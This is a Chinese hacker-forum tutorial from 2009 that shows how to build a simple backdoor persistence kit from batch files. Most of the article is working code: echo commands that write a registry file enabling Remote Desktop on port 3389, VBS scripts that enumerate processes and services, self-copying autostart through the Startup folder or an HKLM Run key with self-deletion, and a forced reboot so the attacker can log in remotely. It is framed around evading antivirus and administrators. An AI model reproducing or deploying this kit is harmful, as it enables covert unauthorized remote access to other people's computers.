首页 网络安全 安全学院 查看内容

批处理自启动驻留简单应用

2009-2-19 08:11 601 0

摘要: 原创首发:黑客警线 作者:邃离 以前看过篇文章--“永不会被查杀的后门”,用到了批处理编程。思路还算可以,就是让后门 每过一段时间就会自动重新启动,并且完全命令实现,杀毒的是不会怀疑的。 我们...
关键词: nbsp echo 3389 reg MACHINE LOCAL CurrentControlSe HKEY vbs Hackcome

原创首发:黑客警线 作者:邃离 以前看过篇文章--“永不会被查杀的后门”,用到了批处理编程。思路还算可以,就是让后门 每过一段时间就会自动重新启动,并且完全命令实现,杀毒的是不会怀疑的。 我们今天来完全的用echo命令来实现,一个简单后门的例子。 //得到admin权限,方便利用,编写开启共享和开启3389或者telnet等  //开彷举一例开自启动开启3389 code:  //输出为open3389.bat echo Windows Registry Editor Version 5.00 >>3389.reg  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg  echo "Enabled"="0" >>3389.reg  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg  echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg   echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg  echo "Start"=dword:00000002 >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg echo "Start"=dword:00000002 >>3389.reg  echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg  echo "Hotkey"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg   echo "PortNumber"=dword:00000D3D >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg  echo "PortNumber"=dword:00000D3D >>3389.reg     //输出为listPID.bat,和以上结合,分别运行。  code:  echo wscript.echo "PID  ProcessName">>1.vbe  echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe  echo next>>1.vbe //列举子启动项目  Code: @echo for each hc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >hc.vbs @echo if hc.startmode="Auto" then wscript.echo hc.name^&" - "^&sc.pathname >>hc.vbs @echo next >>hc.vbs & cscript //nologo hc.vbs & del hc.vbs //两种方法实现自启动,选一种即可  CODE:  @echo off  @copy %0 "%userprofile%\「开始」菜单\程序\启动"  @del %0   CODE:  @echo off  @copy %0 d:\autoexec.bat  @REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d d:\autoexec.bat /f " @del %0  //为了方便,重新启动系统  Code:  @echo for each os in getobject _ >Hackcome.vbs @echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>hackcome.vbs @echo os.win32shutdown(2):next >>hackcome.vbs & cscript //nologo hackcome.vbs & del hackcome.vbs   //mstsc进入电脑  但这种方法太简单,所以易被管理员忽略,因为同样运用逆向的思路。值得思考的是,可以举一反三,因为只是演示,不带写复杂的应用了。  
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部